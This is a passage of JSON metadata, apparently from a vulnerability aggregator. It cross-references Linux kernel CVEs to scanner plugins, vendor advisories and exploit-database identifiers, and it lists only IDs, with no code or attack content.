"UBUNTU_USN-3343-1.NASL", "UBUNTU_USN-3343-2.NASL", "UBUNTU_USN-3469-1.NASL", "UBUNTU_USN-3469-2.NASL", "UBUNTU_USN-3487-1.NASL", "UBUNTU_USN-3583-1.NASL", "UBUNTU_USN-3619-1.NASL", "UBUNTU_USN-3619-2.NASL", "UBUNTU_USN-3653-1.NASL", "UBUNTU_USN-3653-2.NASL", "UBUNTU_USN-3655-1.NASL", "UBUNTU_USN-3657-1.NASL", "UBUNTU_USN-3742-1.NASL", "VIRTUOZZO_VZA-2017-017.NASL", "VIRTUOZZO_VZA-2017-025.NASL", "VIRTUOZZO_VZA-2018-041.NASL", "VIRTUOZZO_VZA-2018-050.NASL", "VIRTUOZZO_VZA-2018-052.NASL", "VIRTUOZZO_VZLSA-2017-0293.NASL", "VIRTUOZZO_VZLSA-2017-0294.NASL", 
"VIRTUOZZO_VZLSA-2017-0323.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105374", "OPENVAS:1361412562310106510", "OPENVAS:1361412562310120008", "OPENVAS:1361412562310120547", "OPENVAS:1361412562310120632", "OPENVAS:1361412562310122851", "OPENVAS:1361412562310122852", "OPENVAS:1361412562310122854", "OPENVAS:1361412562310122855", "OPENVAS:1361412562310122858", "OPENVAS:1361412562310123005", "OPENVAS:1361412562310123031", "OPENVAS:1361412562310123032", "OPENVAS:1361412562310123033", "OPENVAS:1361412562310123034", "OPENVAS:1361412562310123155", "OPENVAS:1361412562310123223", "OPENVAS:1361412562310123230", "OPENVAS:1361412562310123261", "OPENVAS:1361412562310123265", "OPENVAS:1361412562310123266", "OPENVAS:1361412562310123388", "OPENVAS:1361412562310123390", "OPENVAS:1361412562310123391", "OPENVAS:1361412562310123493", "OPENVAS:1361412562310123494", "OPENVAS:1361412562310123495", "OPENVAS:1361412562310123497", "OPENVAS:1361412562310131197", "OPENVAS:1361412562310131198", "OPENVAS:1361412562310131199", "OPENVAS:1361412562310140016", "OPENVAS:1361412562310702906", "OPENVAS:1361412562310703313", "OPENVAS:1361412562310703329", "OPENVAS:1361412562310703448", "OPENVAS:1361412562310703503", "OPENVAS:1361412562310703791", "OPENVAS:1361412562310703945", "OPENVAS:1361412562310704187", "OPENVAS:1361412562310804551", "OPENVAS:1361412562310807219", "OPENVAS:1361412562310807225", "OPENVAS:1361412562310807437", "OPENVAS:1361412562310807465", "OPENVAS:1361412562310841639", "OPENVAS:1361412562310841641", "OPENVAS:1361412562310841644", "OPENVAS:1361412562310841648", "OPENVAS:1361412562310841649", "OPENVAS:1361412562310841655", "OPENVAS:1361412562310841656", "OPENVAS:1361412562310841673", "OPENVAS:1361412562310841674", "OPENVAS:1361412562310841677", "OPENVAS:1361412562310841680", "OPENVAS:1361412562310841734", "OPENVAS:1361412562310841736", "OPENVAS:1361412562310841737", "OPENVAS:1361412562310841738", "OPENVAS:1361412562310841739", "OPENVAS:1361412562310841740", 
"OPENVAS:1361412562310841743", "OPENVAS:1361412562310841744", "OPENVAS:1361412562310841747", "OPENVAS:1361412562310841748", "OPENVAS:1361412562310841749", "OPENVAS:1361412562310841847", "OPENVAS:1361412562310841852", "OPENVAS:1361412562310841893", "OPENVAS:1361412562310841899", "OPENVAS:1361412562310841902", "OPENVAS:1361412562310841903", "OPENVAS:1361412562310841904", "OPENVAS:1361412562310841907", "OPENVAS:1361412562310841998", "OPENVAS:1361412562310841999", "OPENVAS:1361412562310842002", "OPENVAS:1361412562310842003", "OPENVAS:1361412562310842058", "OPENVAS:1361412562310842108", "OPENVAS:1361412562310842109", "OPENVAS:1361412562310842110", "OPENVAS:1361412562310842111", "OPENVAS:1361412562310842113", "OPENVAS:1361412562310842115", "OPENVAS:1361412562310842116", "OPENVAS:1361412562310842379", "OPENVAS:1361412562310842380", "OPENVAS:1361412562310842381", "OPENVAS:1361412562310842383", "OPENVAS:1361412562310842384", "OPENVAS:1361412562310842411", "OPENVAS:1361412562310842414", "OPENVAS:1361412562310842451", "OPENVAS:1361412562310842603", "OPENVAS:1361412562310842605", "OPENVAS:1361412562310842606", "OPENVAS:1361412562310842608", "OPENVAS:1361412562310842609", "OPENVAS:1361412562310842610", "OPENVAS:1361412562310842611", "OPENVAS:1361412562310842612", "OPENVAS:1361412562310842622", "OPENVAS:1361412562310842624", "OPENVAS:1361412562310842627", "OPENVAS:1361412562310842629", "OPENVAS:1361412562310842631", "OPENVAS:1361412562310842649", "OPENVAS:1361412562310842655", "OPENVAS:1361412562310842656", "OPENVAS:1361412562310842666", "OPENVAS:1361412562310842669", "OPENVAS:1361412562310842686", "OPENVAS:1361412562310842687", "OPENVAS:1361412562310842707", "OPENVAS:1361412562310842708", "OPENVAS:1361412562310842709", "OPENVAS:1361412562310842710", "OPENVAS:1361412562310842711", "OPENVAS:1361412562310842712", "OPENVAS:1361412562310842713", "OPENVAS:1361412562310842735", "OPENVAS:1361412562310842741", "OPENVAS:1361412562310842779", "OPENVAS:1361412562310842797", 
"OPENVAS:1361412562310842852", "OPENVAS:1361412562310842853", "OPENVAS:1361412562310842856", "OPENVAS:1361412562310842859", "OPENVAS:1361412562310842860", "OPENVAS:1361412562310843060", "OPENVAS:1361412562310843061", "OPENVAS:1361412562310843062", "OPENVAS:1361412562310843063", "OPENVAS:1361412562310843064", "OPENVAS:1361412562310843065", "OPENVAS:1361412562310843212", "OPENVAS:1361412562310843232", "OPENVAS:1361412562310843354", "OPENVAS:1361412562310843358", "OPENVAS:1361412562310843376", "OPENVAS:1361412562310843461", "OPENVAS:1361412562310843496", "OPENVAS:1361412562310843497", "OPENVAS:1361412562310843528", "OPENVAS:1361412562310843529", "OPENVAS:1361412562310843532", "OPENVAS:1361412562310843534", "OPENVAS:1361412562310843616", "OPENVAS:1361412562310850586", "OPENVAS:1361412562310850587", "OPENVAS:1361412562310850598", "OPENVAS:1361412562310850605", "OPENVAS:1361412562310850626", "OPENVAS:1361412562310850628", "OPENVAS:1361412562310850649", "OPENVAS:1361412562310850670", "OPENVAS:1361412562310850675", "OPENVAS:1361412562310850746", "OPENVAS:1361412562310850750", "OPENVAS:1361412562310850762", "OPENVAS:1361412562310850776", "OPENVAS:1361412562310850805", "OPENVAS:1361412562310850817", "OPENVAS:1361412562310850818", "OPENVAS:1361412562310850821", "OPENVAS:1361412562310850840", "OPENVAS:1361412562310850881", "OPENVAS:1361412562310850918", "OPENVAS:1361412562310851057", "OPENVAS:1361412562310851080", "OPENVAS:1361412562310851161", "OPENVAS:1361412562310851176", "OPENVAS:1361412562310851179", "OPENVAS:1361412562310851197", "OPENVAS:1361412562310851215", "OPENVAS:1361412562310851242", "OPENVAS:1361412562310851273", "OPENVAS:1361412562310851367", "OPENVAS:1361412562310851386", "OPENVAS:1361412562310851390", "OPENVAS:1361412562310851444", "OPENVAS:1361412562310851515", "OPENVAS:1361412562310851516", "OPENVAS:1361412562310851548", "OPENVAS:1361412562310851863", "OPENVAS:1361412562310852048", "OPENVAS:1361412562310867043", "OPENVAS:1361412562310867054", 
"OPENVAS:1361412562310867089", "OPENVAS:1361412562310867096", "OPENVAS:1361412562310867119", "OPENVAS:1361412562310867183", "OPENVAS:1361412562310867240", "OPENVAS:1361412562310867242", "OPENVAS:1361412562310867520", "OPENVAS:1361412562310867522", "OPENVAS:1361412562310867546", "OPENVAS:1361412562310867553", "OPENVAS:1361412562310867580", "OPENVAS:1361412562310867583", "OPENVAS:1361412562310867638", "OPENVAS:1361412562310867651", "OPENVAS:1361412562310867663", "OPENVAS:1361412562310867680", "OPENVAS:1361412562310867682", "OPENVAS:1361412562310867773", "OPENVAS:1361412562310867774", "OPENVAS:1361412562310867811", "OPENVAS:1361412562310867820", "OPENVAS:1361412562310867852", "OPENVAS:1361412562310867857", "OPENVAS:1361412562310867886", "OPENVAS:1361412562310867905", "OPENVAS:1361412562310867911", "OPENVAS:1361412562310867939", "OPENVAS:1361412562310867967", "OPENVAS:1361412562310867986", "OPENVAS:1361412562310868019", "OPENVAS:1361412562310868055", "OPENVAS:1361412562310868076", "OPENVAS:1361412562310868101", "OPENVAS:1361412562310868102", "OPENVAS:1361412562310868149", "OPENVAS:1361412562310868196", "OPENVAS:1361412562310868351", "OPENVAS:1361412562310868403", "OPENVAS:1361412562310868416", "OPENVAS:1361412562310868434", "OPENVAS:1361412562310868437", "OPENVAS:1361412562310868489", "OPENVAS:1361412562310868501", "OPENVAS:1361412562310868583", "OPENVAS:1361412562310868627", "OPENVAS:1361412562310868851", "OPENVAS:1361412562310868859", "OPENVAS:1361412562310868914", "OPENVAS:1361412562310868920", "OPENVAS:1361412562310868954", "OPENVAS:1361412562310868980", "OPENVAS:1361412562310868984", "OPENVAS:1361412562310869077", "OPENVAS:1361412562310869091", "OPENVAS:1361412562310869115", "OPENVAS:1361412562310869136", "OPENVAS:1361412562310869213", "OPENVAS:1361412562310869281", "OPENVAS:1361412562310869284", "OPENVAS:1361412562310869369", "OPENVAS:1361412562310869374", "OPENVAS:1361412562310869392", "OPENVAS:1361412562310869459", "OPENVAS:1361412562310869476", 
"OPENVAS:1361412562310869857", "OPENVAS:1361412562310869889", "OPENVAS:1361412562310871097", "OPENVAS:1361412562310871192", "OPENVAS:1361412562310871426", "OPENVAS:1361412562310871452", "OPENVAS:1361412562310871541", "OPENVAS:1361412562310871546", "OPENVAS:1361412562310871611", "OPENVAS:1361412562310871708", "OPENVAS:1361412562310871761", "OPENVAS:1361412562310871762", "OPENVAS:1361412562310871765", "OPENVAS:1361412562310871783", "OPENVAS:1361412562310872418", "OPENVAS:1361412562310872419", "OPENVAS:1361412562310881832", "OPENVAS:1361412562310881955", "OPENVAS:1361412562310882245", "OPENVAS:1361412562310882285", "OPENVAS:1361412562310882369", "OPENVAS:1361412562310882377", "OPENVAS:1361412562310882664", "OPENVAS:1361412562310882665", "OPENVAS:1361412562310882668", "OPENVAS:1361412562310882674", "OPENVAS:1361412562310882836", "OPENVAS:1361412562310883251", "OPENVAS:1361412562310890833", "OPENVAS:1361412562310891369", "OPENVAS:1361412562311220161020", "OPENVAS:1361412562311220171056", "OPENVAS:1361412562311220171057", "OPENVAS:1361412562311220171122", "OPENVAS:1361412562311220171123", "OPENVAS:1361412562311220171271", "OPENVAS:1361412562311220171292", "OPENVAS:1361412562311220181054", "OPENVAS:1361412562311220181133", "OPENVAS:1361412562311220181246", "OPENVAS:1361412562311220181360", "OPENVAS:1361412562311220181369", "OPENVAS:1361412562311220181406", "OPENVAS:1361412562311220191475", "OPENVAS:1361412562311220191477", "OPENVAS:1361412562311220191479", "OPENVAS:1361412562311220191480", "OPENVAS:1361412562311220191485", "OPENVAS:1361412562311220191488", "OPENVAS:1361412562311220191489", "OPENVAS:1361412562311220191491", "OPENVAS:1361412562311220191494", "OPENVAS:1361412562311220191499", "OPENVAS:1361412562311220191501", "OPENVAS:1361412562311220191502", "OPENVAS:702906", "OPENVAS:703313", "OPENVAS:703329", "OPENVAS:703448", "OPENVAS:703503", "OPENVAS:703791", "OPENVAS:804551", "OPENVAS:841639", "OPENVAS:841641", "OPENVAS:841644", "OPENVAS:841648", "OPENVAS:841649", 
"OPENVAS:841655", "OPENVAS:841656", "OPENVAS:841673", "OPENVAS:841674", "OPENVAS:841677", "OPENVAS:841680", "OPENVAS:841734", "OPENVAS:841736", "OPENVAS:841737", "OPENVAS:841738", "OPENVAS:841739", "OPENVAS:841740", "OPENVAS:841743", "OPENVAS:841744", "OPENVAS:841747", "OPENVAS:841748", "OPENVAS:841749", "OPENVAS:867043", "OPENVAS:867054", "OPENVAS:867089", "OPENVAS:867096", "OPENVAS:867119", "OPENVAS:867183", "OPENVAS:867240", "OPENVAS:867242", "OPENVAS:867520", "OPENVAS:867522", "OPENVAS:867546", "OPENVAS:867553", "OPENVAS:867580", "OPENVAS:867583", "OPENVAS:867638", "OPENVAS:867651", "OPENVAS:867663", "OPENVAS:867680", "OPENVAS:867682", "OPENVAS:867773", "OPENVAS:867774", "OPENVAS:871097", "OPENVAS:881832"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2018"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-1801", "ELSA-2013-2587", "ELSA-2013-2588", "ELSA-2013-2589", "ELSA-2014-0771", "ELSA-2014-1971", "ELSA-2014-3002", "ELSA-2014-3042", "ELSA-2014-3043", "ELSA-2014-3084", "ELSA-2014-3085", "ELSA-2014-3086", "ELSA-2014-3104", "ELSA-2015-1623", "ELSA-2015-1778", "ELSA-2015-3012", "ELSA-2015-3071", "ELSA-2015-3072", "ELSA-2015-3073", "ELSA-2016-0045", "ELSA-2016-0045-1", "ELSA-2016-0064", "ELSA-2016-0185", "ELSA-2016-0855", "ELSA-2016-2574", "ELSA-2016-3509", "ELSA-2016-3510", "ELSA-2016-3596", "ELSA-2016-3644", "ELSA-2017-0293", "ELSA-2017-0294", "ELSA-2017-0294-1", "ELSA-2017-0307", "ELSA-2017-0323", "ELSA-2017-0323-1", "ELSA-2017-0817", "ELSA-2017-0933", "ELSA-2017-3520", "ELSA-2017-3521", "ELSA-2017-3522", "ELSA-2017-3534", "ELSA-2017-3567", "ELSA-2017-3640", "ELSA-2017-3651", "ELSA-2017-3659", "ELSA-2018-0151", "ELSA-2018-1062", "ELSA-2018-1854", "ELSA-2018-3083", "ELSA-2018-4114", "ELSA-2018-4164", "ELSA-2018-4196", "ELSA-2018-4211", "ELSA-2018-4214", "ELSA-2019-4642", "ELSA-2019-4742", "ELSA-2020-2430", "ELSA-2021-9486", "ELSA-2021-9487"]}, {"type": "osv", "idList": ["OSV:DLA-0015-1", "OSV:DLA-1369-1", "OSV:DLA-155-1", "OSV:DLA-310-1", "OSV:DLA-412-1", 
"OSV:DLA-439-1", "OSV:DLA-833-1", "OSV:DSA-2906-1", "OSV:DSA-3313-1", "OSV:DSA-3329-1", "OSV:DSA-3448-1", "OSV:DSA-3503-1", "OSV:DSA-3791-1", "OSV:DSA-3945-1", "OSV:DSA-4187-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:135330", "PACKETSTORM:141331", "PACKETSTORM:141339", "PACKETSTORM:148867"]}, {"type": "paloalto", "idList": ["PAN-SA-2016-0025"]}, {"type": "photon", "idList": ["PHSA-2017-0005", "PHSA-2017-0078", "PHSA-2017-0091", "PHSA-2018-0116", "PHSA-2018-0122", "PHSA-2018-1.0-0122", "PHSA-2019-0122"]}, {"type": "redhat", "idList": ["RHSA-2013:1801", "RHSA-2013:1802", "RHSA-2014:0100", "RHSA-2014:0284", "RHSA-2014:0439", "RHSA-2014:0771", "RHSA-2014:0815", "RHSA-2014:1318", "RHSA-2014:1971", "RHSA-2015:1623", "RHSA-2015:1778", "RHSA-2015:1787", "RHSA-2015:1788", "RHSA-2016:0045", "RHSA-2016:0064", "RHSA-2016:0065", "RHSA-2016:0068", "RHSA-2016:0103", "RHSA-2016:0855", "RHSA-2016:1096", "RHSA-2016:1100", "RHSA-2016:1225", "RHSA-2016:2574", "RHSA-2016:2584", "RHSA-2017:0293", "RHSA-2017:0294", "RHSA-2017:0295", "RHSA-2017:0316", "RHSA-2017:0323", "RHSA-2017:0324", "RHSA-2017:0345", "RHSA-2017:0346", "RHSA-2017:0347", "RHSA-2017:0365", "RHSA-2017:0366", "RHSA-2017:0403", "RHSA-2017:0501", "RHSA-2017:0817", "RHSA-2017:0932", "RHSA-2017:1209", "RHSA-2018:0151", "RHSA-2018:0152", "RHSA-2018:0181", "RHSA-2018:0654", "RHSA-2018:0676", "RHSA-2018:1062", "RHSA-2018:1854", "RHSA-2018:2948", "RHSA-2018:3083", "RHSA-2018:3096", "RHSA-2018:3459", "RHSA-2018:3540", "RHSA-2018:3586", "RHSA-2018:3590", "RHSA-2018:3591", "RHSA-2019:4154", "RHSA-2020:2430"]}, {"type": "redhatcve", "idList": ["RH:CVE-2014-9410", "RH:CVE-2016-10318", "RH:CVE-2017-12192", "RH:CVE-2017-18203", "RH:CVE-2017-18344"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29995", "SECURITYVULNS:DOC:30048", "SECURITYVULNS:DOC:30431", "SECURITYVULNS:DOC:30929", "SECURITYVULNS:DOC:31142", "SECURITYVULNS:DOC:31315", "SECURITYVULNS:DOC:31502", "SECURITYVULNS:DOC:32350", "SECURITYVULNS:DOC:32352", 
"SECURITYVULNS:VULN:13400", "SECURITYVULNS:VULN:13438", "SECURITYVULNS:VULN:13475", "SECURITYVULNS:VULN:13844", "SECURITYVULNS:VULN:13997", "SECURITYVULNS:VULN:14579"]}, {"type": "seebug", "idList": ["SSV:61934", "SSV:62031", "SSV:90673", "SSV:91603", "SSV:92700"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:0677-1", "OPENSUSE-SU-2014:0678-1", "OPENSUSE-SU-2014:0957-1", "OPENSUSE-SU-2014:0985-1", "OPENSUSE-SU-2014:1669-1", "OPENSUSE-SU-2014:1677-1", "OPENSUSE-SU-2015:0566-1", "OPENSUSE-SU-2015:0713-1", "OPENSUSE-SU-2015:0714-1", "OPENSUSE-SU-2015:1382-1", "OPENSUSE-SU-2016:0280-1", "OPENSUSE-SU-2016:0301-1", "OPENSUSE-SU-2016:0318-1", "OPENSUSE-SU-2016:0537-1", "OPENSUSE-SU-2016:1008-1", "OPENSUSE-SU-2016:1798-1", "OPENSUSE-SU-2016:2144-1", "OPENSUSE-SU-2016:2290-1", "OPENSUSE-SU-2016:2649-1", "OPENSUSE-SU-2016:3021-1", "OPENSUSE-SU-2017:0541-1", "OPENSUSE-SU-2017:0547-1", "OPENSUSE-SU-2017:1215-1", "OPENSUSE-SU-2018:2242-1", "OPENSUSE-SU-2018:2404-1", "SUSE-SU-2014:0459-1", "SUSE-SU-2014:0531-1", "SUSE-SU-2014:0536-1", "SUSE-SU-2014:0537-1", "SUSE-SU-2014:0696-1", "SUSE-SU-2014:0807-1", "SUSE-SU-2014:0908-1", "SUSE-SU-2014:0909-1", "SUSE-SU-2014:0910-1", "SUSE-SU-2014:0911-1", "SUSE-SU-2014:0912-1", "SUSE-SU-2014:1693-1", "SUSE-SU-2014:1693-2", "SUSE-SU-2014:1695-1", "SUSE-SU-2014:1695-2", "SUSE-SU-2015:0481-1", "SUSE-SU-2015:0581-1", "SUSE-SU-2015:0736-1", "SUSE-SU-2015:0812-1", "SUSE-SU-2015:1224-1", "SUSE-SU-2015:1324-1", "SUSE-SU-2015:1478-1", "SUSE-SU-2015:1487-1", "SUSE-SU-2015:1488-1", "SUSE-SU-2015:1489-1", "SUSE-SU-2015:1490-1", "SUSE-SU-2015:1491-1", "SUSE-SU-2015:1592-1", "SUSE-SU-2015:1611-1", "SUSE-SU-2016:0186-1", "SUSE-SU-2016:0205-1", "SUSE-SU-2016:0341-1", "SUSE-SU-2016:0585-1", "SUSE-SU-2016:0745-1", "SUSE-SU-2016:0746-1", "SUSE-SU-2016:0747-1", "SUSE-SU-2016:0750-1", "SUSE-SU-2016:0751-1", "SUSE-SU-2016:0752-1", "SUSE-SU-2016:0753-1", "SUSE-SU-2016:0755-1", "SUSE-SU-2016:0756-1", "SUSE-SU-2016:0757-1", "SUSE-SU-2016:0785-1", 
"SUSE-SU-2016:0911-1", "SUSE-SU-2016:1019-1", "SUSE-SU-2016:1031-1", "SUSE-SU-2016:1032-1", "SUSE-SU-2016:1033-1", "SUSE-SU-2016:1034-1", "SUSE-SU-2016:1035-1", "SUSE-SU-2016:1037-1", "SUSE-SU-2016:1038-1", "SUSE-SU-2016:1039-1", "SUSE-SU-2016:1040-1", "SUSE-SU-2016:1041-1", "SUSE-SU-2016:1045-1", "SUSE-SU-2016:1046-1", "SUSE-SU-2016:1102-1", "SUSE-SU-2016:1203-1", "SUSE-SU-2016:1764-1", "SUSE-SU-2016:2074-1", "SUSE-SU-2016:3304-1", "SUSE-SU-2017:1183-1", "SUSE-SU-2017:1247-1", "SUSE-SU-2017:1301-1", "SUSE-SU-2017:1360-1", "SUSE-SU-2017:1990-1", "SUSE-SU-2017:2342-1", "SUSE-SU-2017:2525-1", "SUSE-SU-2017:2908-1", "SUSE-SU-2017:2920-1", "SUSE-SU-2017:3165-1", "SUSE-SU-2017:3265-1", "SUSE-SU-2018:0040-1", "SUSE-SU-2018:1080-1", "SUSE-SU-2018:1172-1", "SUSE-SU-2018:1220-1", "SUSE-SU-2018:1221-1"]}, {"type": "symantec", "idList": ["SMNTC-1349"]}, {"type": "thn", "idList": ["THN:11E7CC33794D9968747131F3F0AE8716", "THN:2F321B0D3CF635D0F8D272948E9B31C9"]}, {"type": "threatpost", "idList": ["THREATPOST:178E0668804E2DA1322D2C1DCF6CA893", "THREATPOST:3457E4B368AF24E94CB5545AC02382A8", "THREATPOST:45807D1856E34DEFF51A771D0E730AA3", "THREATPOST:AAD833DA9CB72C65E36AA2758E011A09", "THREATPOST:C5F01C375D7DB776A2A5902570B2E5FD"]}, {"type": "ubuntu", "idList": ["USN-2040-1", "USN-2042-1", "USN-2043-1", "USN-2044-1", "USN-2046-1", "USN-2049-1", "USN-2050-1", "USN-2066-1", "USN-2067-1", "USN-2069-1", "USN-2073-1", "USN-2128-1", "USN-2129-1", "USN-2133-1", "USN-2134-1", "USN-2135-1", "USN-2136-1", "USN-2137-1", "USN-2138-1", "USN-2139-1", "USN-2140-1", "USN-2141-1", "USN-2233-1", "USN-2234-1", "USN-2283-1", "USN-2284-1", "USN-2285-1", "USN-2286-1", "USN-2287-1", "USN-2289-1", "USN-2376-1", "USN-2377-1", "USN-2378-1", "USN-2379-1", "USN-2441-1", "USN-2442-1", "USN-2443-1", "USN-2445-1", "USN-2446-1", "USN-2447-1", "USN-2447-2", "USN-2448-1", "USN-2448-2", "USN-2464-1", "USN-2515-1", "USN-2515-2", "USN-2516-1", "USN-2516-2", "USN-2516-3", "USN-2517-1", "USN-2518-1", "USN-2680-1", 
"USN-2681-1", "USN-2682-1", "USN-2683-1", "USN-2684-1", "USN-2685-1", "USN-2713-1", "USN-2714-1", "USN-2870-1", "USN-2870-2", "USN-2871-1", "USN-2871-2", "USN-2872-1", "USN-2872-2", "USN-2872-3", "USN-2873-1", "USN-2889-1", "USN-2889-2", "USN-2890-1", "USN-2890-2", "USN-2890-3", "USN-2908-1", "USN-2908-2", "USN-2908-3", "USN-2908-4", "USN-2908-5", "USN-2931-1", "USN-2932-1", "USN-2946-1", "USN-2946-2", "USN-2947-1", "USN-2947-2", "USN-2947-3", "USN-2948-1", "USN-2948-2", "USN-2949-1", "USN-2967-1", "USN-2967-2", "USN-2989-1", "USN-2998-1", "USN-3053-1", "USN-3054-1", "USN-3055-1", "USN-3056-1", "USN-3057-1", "USN-3206-1", "USN-3207-1", "USN-3207-2", "USN-3208-1", "USN-3208-2", "USN-3209-1", "USN-3343-1", "USN-3343-2", "USN-3469-1", "USN-3469-2", "USN-3487-1", "USN-3583-1", "USN-3583-2", "USN-3619-1", "USN-3619-2", "USN-3653-1", "USN-3653-2", "USN-3655-1", "USN-3655-2", "USN-3657-1", "USN-3742-1", "USN-3742-2", "USN-3742-3"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-4470", "UB:CVE-2014-0131", "UB:CVE-2014-1874", "UB:CVE-2014-3181", "UB:CVE-2014-8134", "UB:CVE-2014-9410", "UB:CVE-2014-9428", "UB:CVE-2014-9940", "UB:CVE-2015-5327", "UB:CVE-2015-5364", "UB:CVE-2015-5366", "UB:CVE-2015-8787", "UB:CVE-2015-8812", "UB:CVE-2016-0728", "UB:CVE-2016-10318", "UB:CVE-2016-2069", "UB:CVE-2016-4794", "UB:CVE-2017-12192", "UB:CVE-2017-15274", "UB:CVE-2017-18203", "UB:CVE-2017-18344", "UB:CVE-2017-6074"]}, {"type": "virtuozzo", "idList": ["VZA-2017-016", "VZA-2017-017", "VZA-2017-024", "VZA-2017-025", "VZA-2018-040", "VZA-2018-041", "VZA-2018-050", "VZA-2018-052"]}, {"type": "zdt", "idList": ["1337DAY-ID-25516", "1337DAY-ID-25517", "1337DAY-ID-27133", "1337DAY-ID-27134", "1337DAY-ID-30863"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2017-914"]}, {"type": "android", "idList": ["ANDROID:CVE-2016-0728"]}, {"type": "androidsecurity", "idList": ["ANDROID:2016-12-01"]}, {"type": "archlinux", "idList": 
["ASA-201601-20", "ASA-201601-26"]}, {"type": "canvas", "idList": ["SHOW_TIMER_LEAK"]}, {"type": "centos", "idList": ["CESA-2017:0293", "CESA-2017:0294", "CESA-2017:0323"]}, {"type": "checkpoint_security", "idList": ["CPS:SK109752"]}, {"type": "cisa", "idList": ["CISA:FCB4B9C4CB605F6B805399E8D3B54A48"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:14981E32944F89BB69AF2D0158A379F0", "CFOUNDRY:59BA3F002F833C86F9D716E2A3575DCB"]}, {"type": "cve", "idList": ["CVE-2013-4470", "CVE-2014-0131", "CVE-2015-8787", "CVE-2017-12192", "CVE-2017-18203", "CVE-2017-6074"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1369-1:33F82", "DEBIAN:DSA-3791-1:AE0FD", "DEBIAN:DSA-3945-1:532A6", "DEBIAN:DSA-4187-1:481CA"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-4470", "DEBIANCVE:CVE-2014-0131", "DEBIANCVE:CVE-2014-1874", "DEBIANCVE:CVE-2014-3181", "DEBIANCVE:CVE-2014-8134", "DEBIANCVE:CVE-2014-9428", "DEBIANCVE:CVE-2014-9940", "DEBIANCVE:CVE-2015-5327", "DEBIANCVE:CVE-2015-5364", "DEBIANCVE:CVE-2015-8787", "DEBIANCVE:CVE-2015-8812", "DEBIANCVE:CVE-2016-0728", "DEBIANCVE:CVE-2016-10318", "DEBIANCVE:CVE-2016-2069", "DEBIANCVE:CVE-2016-4794", "DEBIANCVE:CVE-2017-12192", "DEBIANCVE:CVE-2017-18203", "DEBIANCVE:CVE-2017-18344", "DEBIANCVE:CVE-2017-6074"]}, {"type": "exploitdb", "idList": ["EDB-ID:41457", "EDB-ID:41458"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4EEB4BE9E101A3B6E5FA4A3FC9B06CCD"]}, {"type": "f5", "idList": ["F5:K82508682", "SOL01948202", "SOL15699", "SOL17307"]}, {"type": "fedora", "idList": ["FEDORA:1F466601E823", "FEDORA:6437E61257FA", "FEDORA:E7CE72245B"]}, {"type": "hackerone", "idList": ["H1:347282"]}, {"type": "ibm", "idList": ["658C6A388449448220E16F3A05A122A56F35F4A9A9370C4B63DC0779B971B6CE"]}, {"type": "kitploit", "idList": ["KITPLOIT:4462385753504235463"]}, {"type": "lenovo", "idList": ["LENOVO:PS500107-NOSID"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/F5-BIG-IP-CVE-2017-6074/", "MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2017-6074/", 
"MSF:ILITIES/SUSE-CVE-2017-6074/", "MSF:ILITIES/UBUNTU-USN-2378-1/"]}, {"type": "myhack58", "idList": ["MYHACK58:62201783679", "MYHACK58:62201783692"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2013-1801.NASL", "CENTOS_RHSA-2017-0293.NASL", "CENTOS_RHSA-2017-0294.NASL", "CENTOS_RHSA-2017-0323.NASL", "DEBIAN_DLA-412.NASL", "DEBIAN_DSA-3791.NASL", "F5_BIGIP_SOL17309.NASL", "FEDORA_2014-17283.NASL", "FEDORA_2016-2F25D12C51.NASL", "FEDORA_2016-7E12AE5359.NASL", "FEDORA_2016-9FBE2C258B.NASL", "FEDORA_2016-E7162262B0.NASL", "FEDORA_2017-4B9F61C68D.NASL", "FEDORA_2017-F519EBB3C4.NASL", "OPENSUSE-2015-301.NASL", "OPENSUSE-2016-256.NASL", "OPENSUSE-2017-286.NASL", "OPENSUSE-2017-287.NASL", "ORACLELINUX_ELSA-2016-3509.NASL", "ORACLELINUX_ELSA-2017-0293.NASL", "ORACLELINUX_ELSA-2017-0294.NASL", "ORACLELINUX_ELSA-2017-0323.NASL", "ORACLELINUX_ELSA-2017-3520.NASL", "ORACLELINUX_ELSA-2017-3521.NASL", "ORACLELINUX_ELSA-2017-3522.NASL", "ORACLELINUX_ELSA-2019-4642.NASL", "ORACLELINUX_ELSA-2019-4742.NASL", "ORACLEVM_OVMSA-2017-0044.NASL", "ORACLEVM_OVMSA-2017-0045.NASL", "ORACLEVM_OVMSA-2017-0046.NASL", "ORACLEVM_OVMSA-2019-0022.NASL", "REDHAT-RHSA-2016-0064.NASL", "REDHAT-RHSA-2017-0293.NASL", "REDHAT-RHSA-2017-0294.NASL", "REDHAT-RHSA-2017-0295.NASL", "REDHAT-RHSA-2017-0316.NASL", "REDHAT-RHSA-2017-0323.NASL", "REDHAT-RHSA-2017-0324.NASL", "REDHAT-RHSA-2017-0345.NASL", "REDHAT-RHSA-2017-0346.NASL", "REDHAT-RHSA-2017-0347.NASL", "REDHAT-RHSA-2017-0365.NASL", "REDHAT-RHSA-2017-0366.NASL", "REDHAT-RHSA-2017-0403.NASL", "REDHAT-RHSA-2017-0501.NASL", "REDHAT-RHSA-2018-2948.NASL", "SL_20170222_KERNEL_ON_SL6_X.NASL", "SL_20170222_KERNEL_ON_SL7_X.NASL", "SL_20170224_KERNEL_ON_SL5_X.NASL", "SUSE_SU-2018-0040-1.NASL", "UBUNTU_USN-2447-1.NASL", "UBUNTU_USN-2681-1.NASL", "UBUNTU_USN-2908-1.NASL", "UBUNTU_USN-2908-2.NASL", "UBUNTU_USN-2908-3.NASL", "UBUNTU_USN-2908-4.NASL", "UBUNTU_USN-2908-5.NASL", "UBUNTU_USN-2931-1.NASL", "UBUNTU_USN-3208-1.NASL", "UBUNTU_USN-3208-2.NASL", 
